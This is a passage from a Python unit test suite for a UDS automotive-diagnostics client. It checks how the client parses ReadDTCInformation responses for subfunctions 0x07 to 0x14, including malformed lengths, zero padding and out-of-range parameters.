self.assertEqual(request, "\x19\x07\xC0\x01")
self.conn.fromuserqueue.put("\x59\x07\xFB\x01\x12\x34")
def _test_normal_behaviour_param_int(self):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x07\xC0\x01")
self.conn.fromuserqueue.put("\x59\x07\xFB\x01\x12\x34")
def _test_normal_behaviour_param_instance(self):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = Dtc.Status(test_failed=True), severity_mask=Dtc.Severity(check_immediately=True, check_at_next_exit=True))
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_normal_behaviour_harmless_extra_byte(self):
self.wait_request_and_respond("\x59\x07\xFB\x01\x12\x34\x00\x11\x22")
def _test_normal_behaviour_harmless_extra_byte(self):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(response.service_data.dtc_format, Dtc.Format.ISO14229_1)
self.assertEqual(response.service_data.dtc_count, 0x1234)
def test_bad_response_subfn_exception(self):
self.wait_request_and_respond("\x59\x08\xFB\x01\x12\x34")
def _test_bad_response_subfn_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_subfn_no_exception(self):
self.wait_request_and_respond("\x59\x08\xFB\x01\x12\x34")
def _test_bad_response_subfn_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F\x07\xFB\x01\x12\x34")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F\x07\xFB\x01\x12\x34")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def bad_length_response_server_task(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59\x07")
self.wait_request_and_respond("\x59\x07\xFB")
self.wait_request_and_respond("\x59\x07\xFB\x01")
self.wait_request_and_respond("\x59\x07\xFB\x01\x12")
def test_bad_length_response_exception(self):
self.bad_length_response_server_task()
def _test_bad_length_response_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_length_response_no_exception(self):
self.bad_length_response_server_task()
def _test_bad_length_response_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(5):
response = self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x100, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = -1, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = u'a', severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0x100)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=-1)
with self.assertRaises(ValueError):
self.udsclient.get_number_of_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=u'a')
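# Subfunction 0x08 (reportDTCBySeverityMaskRecord): same request layout as subfunction 0x07,
# but the positive response lists full records of [severity, functional unit, DTC (3 bytes),
# status] after the status availability mask.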
class TestReportDTCBySeverityMaskRecord(ClientServerTest): # Subfn = 0x8
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0xFB)
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x80)
self.assertEqual(response.service_data.dtcs[0].functional_unit, 0x99)
self.assertEqual(response.service_data.dtcs[1].id, 0x123457)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x40)
self.assertEqual(response.service_data.dtcs[1].functional_unit, 0x88)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(response.service_data.dtcs[2].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].functional_unit, 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x08\xC0\x01")
self.conn.fromuserqueue.put("\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60")
def _test_normal_behaviour(self):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x08\xC0\x01")
self.conn.fromuserqueue.put("\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60")
def _test_normal_behaviour_param_instance(self):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = Dtc.Status(test_failed=True), severity_mask=Dtc.Severity(check_immediately=True, check_at_next_exit=True))
def test_dtc_duplicate(self):
self.wait_request_and_respond('\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x56\x60')
def _test_dtc_duplicate(self):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. Server should avoid duplicate
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x80)
self.assertEqual(response.service_data.dtcs[0].functional_unit, 0x99)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x60)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x40)
self.assertEqual(response.service_data.dtcs[1].functional_unit, 0x88)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(7):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, False, False, True, True]
for i in xrange(7):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
should_return_invalid = [True, True, True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, None, None, False, None]
for i in xrange(7):
if should_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
else:
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero(self):
data = '\x59\x08\xFB\x80\x99\x12\x34\x56\x20\x40\x88\x12\x34\x57\x60'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
should_return_invalid = [True, True, True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, None, None, True, None]
for i in xrange(7):
if should_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
else:
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond('\x59\x08\xFB')
def _test_no_dtc(self):
response = self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction(self):
self.wait_request_and_respond('\x59\x09\xFB')
def _test_bad_response_subfunction(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_service(self):
self.wait_request_and_respond('\x6F\x08\xFB')
def _test_bad_response_service(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_bad_response_length(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x08')
def _test_bad_response_length(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0xC0)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x100, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = -1, severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = u'aaa', severity_mask=0xC0)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=0x100)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=u'aaa')
# Only one DTC must be returned
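# Subfunction 0x09 (reportSeverityInformationOfDTC): the request carries a single DTC number;
# the positive response holds the status availability mask plus that DTC's severity,
# functional unit, id and status.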
class TestReportSeverityInformationOfDTC(ClientServerTest): # Subfn = 0x9
def client_assert_response(self, response):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0xFB)
number_of_dtc = 1
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x80)
self.assertEqual(response.service_data.dtcs[0].functional_unit, 0x99)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x09\x12\x34\x56")
self.conn.fromuserqueue.put("\x59\x09\xFB\x80\x99\x12\x34\x56\x20")
def _test_normal_behaviour(self):
response = self.udsclient.get_dtc_severity(0x123456)
self.client_assert_response(response)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x09\x12\x34\x56")
self.conn.fromuserqueue.put("\x59\x09\xFB\x80\x99\x12\x34\x56\x20")
def _test_normal_behaviour_param_instance(self):
self.udsclient.get_dtc_severity(Dtc(0x123456))
def test_normal_behaviour_zeropadding_no_effect(self):
data = '\x59\x09\xFB\x80\x99\x12\x34\x56\x20'
for i in xrange(5):
self.wait_request_and_respond(data + "\x00" * (i+1))
def _test_normal_behaviour_zeropadding_no_effect(self):
for i in xrange(5):
response = self.udsclient.get_dtc_severity(0x123456)
self.client_assert_response(response)
def test_normal_behaviour_extrabytes_no_effect(self):
data = '\x59\x09\xFB\x80\x99\x12\x34\x56\x20'
extra_bytes = '\x12\x34\x56\x78\x9a'
for i in xrange(5):
self.wait_request_and_respond(data + extra_bytes[:i])
def _test_normal_behaviour_extrabytes_no_effect(self):
for i in xrange(5):
response = self.udsclient.get_dtc_severity(0x123456)
self.client_assert_response(response)
def test_no_dtc(self):
self.wait_request_and_respond('\x59\x09\xFB')
def _test_no_dtc(self):
response = self.udsclient.get_dtc_severity(0x123456)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond('\x59\x0A\xFB')
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_severity(0x123456)
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond('\x59\x0A\xFB')
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_severity(0x123456)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond('\x6F\x09\xFB')
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_severity(0x123456)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond('\x6F\x09\xFB')
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_severity(0x123456)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def bad_response_length_server_task(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x09')
# '\x59\x09\xFB' alone is a valid response (no DTC), so it is not included here
self.wait_request_and_respond('\x59\x09\xFB\x80')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99\x12')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99\x12\x34')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99\x12\x34\x56')
def test_bad_response_length_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_exception(self):
for i in xrange(7):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_severity(0x123456)
def test_bad_response_length_no_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(7):
response = self.udsclient.get_dtc_severity(0x123456)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_severity(-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_severity(0x1000000)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_severity(u'a')
with self.assertRaises(TypeError):
self.udsclient.get_dtc_severity()
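# Shared test body for the parameter-less report subfunctions whose positive response is just
# the status availability mask followed by [DTC (3 bytes), status] pairs. Concrete TestCases
# supply the subfunction byte and the name of the client method to call.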
class GenericTestNoParamRequest_DtcAndStatusMaskResponse(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def do_client_request(self):
return getattr(self.udsclient, self.client_function).__call__()
def client_assert_response(self, response, expect_all_zero_fourth_dtc=False):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0x7F)
number_of_dtc = 4 if expect_all_zero_fourth_dtc else 3
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x24)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[1].id, 0x234505)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].id, 0xabcd01)
self.assertEqual(response.service_data.dtcs[2].status.get_byte_as_int(), 0x2F)
self.assertEqual(response.service_data.dtcs[2].severity.get_byte_as_int(), 0x00)
if expect_all_zero_fourth_dtc:
self.assertEqual(response.service_data.dtcs[3].id, 0)
self.assertEqual(response.service_data.dtcs[3].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[3].severity.get_byte_as_int(), 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb)
self.conn.fromuserqueue.put('\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F')
def _test_normal_behaviour(self):
self.client_assert_response(self.do_client_request())
def test_dtc_duplicate(self):
self.wait_request_and_respond('\x59'+self.sb+'\x7F\x12\x34\x56\x24\x12\x34\x56\x25')
def _test_dtc_duplicate(self):
response = self.do_client_request()
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. Server should avoid duplicate
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x24)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x25)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_fourth_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_fourth_dtc_values = [False, False, False, True, True]
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def normal_behaviour_zeropadding_notok_ignore_allzero_server_task(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.normal_behaviour_zeropadding_notok_ignore_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
self.client_assert_response(self.do_client_request(), expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.normal_behaviour_zeropadding_notok_ignore_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def normal_behaviour_zeropadding_notok_consider_allzero_server_task(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.normal_behaviour_zeropadding_notok_consider_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
response = self.do_client_request()
self.client_assert_response(response, expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.normal_behaviour_zeropadding_notok_consider_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59"+self.sb+"\x7F")
def _test_no_dtc(self):
response = self.do_client_request()
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\x7F")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\x7F")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\x7F")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\x7F")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_length_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.do_client_request()
def test_bad_response_length_no_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_no_exception(self):
for i in xrange(2):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.do_client_request()
self.assertFalse(response.valid)
class TestReportSupportedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xA
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xA, client_function = u'get_supported_dtc')
class TestReportFirstTestFailedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xB
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xB, client_function = u'get_first_test_failed_dtc')
class TestReportFirstConfirmedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xC
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xC, client_function = u'get_first_confirmed_dtc')
class TestReportMostRecentTestFailedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xD
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xD, client_function = u'get_most_recent_test_failed_dtc')
class TestReportMostRecentConfirmedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xE
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xE, client_function = u'get_most_recent_confirmed_dtc')
class TestReportMirrorMemoryDTCByStatusMask(ClientServerTest, GenericTestStatusMaskRequest_DtcAndStatusMaskResponse): # Subfn = 0xF
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestStatusMaskRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xf, client_function = u'get_mirrormemory_dtc_by_status_mask')
class TestReportMirrorMemoryDTCExtendedDataRecordByDTCNumber(ClientServerTest, GenericReportExtendedDataByRecordNumber): # Subfn = 0x10
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericReportExtendedDataByRecordNumber.__init__(self, subfunction=0x10, client_function = u'get_mirrormemory_dtc_extended_data_by_dtc_number')
# TODO HN
class TestReportNumberOfMirrorMemoryDTCByStatusMask(ClientServerTest, GenericTest_RequestStatusMask_ResponseNumberOfDTC): # Subfn = 0x11
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTest_RequestStatusMask_ResponseNumberOfDTC.__init__(self, subfunction=0x11, client_function = u'get_mirrormemory_number_of_dtc_by_status_mask')
# TODO HN
class TestReportNumberOfEmissionsRelatedOBDDTCByStatusMask(ClientServerTest, GenericTest_RequestStatusMask_ResponseNumberOfDTC): # Subfn = 0x12
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTest_RequestStatusMask_ResponseNumberOfDTC.__init__(self, subfunction=0x12, client_function = u'get_number_of_emission_dtc_by_status_mask')
class TestReportEmissionsRelatedOBDDTCByStatusMask(ClientServerTest, GenericTestStatusMaskRequest_DtcAndStatusMaskResponse): # Subfn = 0x13
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestStatusMaskRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0x13, client_function = u'get_emission_dtc_by_status_mask')
class TestReportDTCFaultDetectionCounter(ClientServerTest): # Subfn = 0x14
def do_client_request(self):
return self.udsclient.get_dtc_fault_counter()
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].fault_counter, 0x01)
self.assertEqual(response.service_data.dtcs[1].id, 0x123457)
self.assertEqual(response.service_data.dtcs[1].fault_counter, 0x7E)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(response.service_data.dtcs[2].fault_counter, 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x14")
self.conn.fromuserqueue.put("\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E")
def _test_normal_behaviour(self):
